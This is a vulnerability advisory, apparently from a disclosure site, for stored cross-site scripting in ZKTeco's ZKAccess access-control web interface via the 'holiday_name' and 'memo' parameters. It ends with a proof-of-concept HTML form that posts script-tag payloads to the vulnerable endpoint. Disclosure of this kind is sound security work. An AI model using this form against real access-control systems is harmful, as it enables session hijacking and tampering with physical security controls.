ZKTeco ZKAccess Security System 5.3.1 Persistent Cross Site Scripting
Posted on 31 August 2016
i>>?<!-- ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd Product web page: http://www.zkteco.com Affected version: 5.3.12252 Summary: ZKAccess Systems are built on flexible, open technology to provide management, real-time monitoring, and control of your access control system-all from a browser, with no additional software to install. Our secure Web-hosted infrastructure and centralized online administration reduce your IT costs and allow you to easily manage all of your access points in a single location. C3-100's versatile design features take care of present and future needs with ease and efficiency. It is one of the most rugged and reliable controllers on the market, with a multitude of built-in features. The C3-100 can communicate at 38.4 Kbps via RS-485 configuration or Ethernet TCP/IP networks. It can store up to 30,000 cardholders. Desc: Input passed to the 'holiday_name' and 'memo' POST parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: CherryPy/3.1.0beta3 WSGI Server Firmware: AC Ver 4.1.9 3893-07 Jan 6 2016 Python 2.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5368 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php 18.07.2016 --> <html> <body> <form action="http://127.0.0.1/data/iaccess/AccHolidays/_new_/?_lock=1" method="POST"> <input type="hidden" name="pk" value="None" /> <input type="hidden" name="holiday_name" value=""><script>alert(1)</script>" /> <input type="hidden" name="holiday_type" value="1" /> <input type="hidden" name="start_date" value="09/13/2016" /> <input type="hidden" name="end_date" value="10/18/2016" /> <input type="hidden" name="loop_by_year" value="2" /> <input type="hidden" name="memo" value=""><script>alert(2)</script>" /> <input type="submit" value="Submit request" /> </form> </body> </html>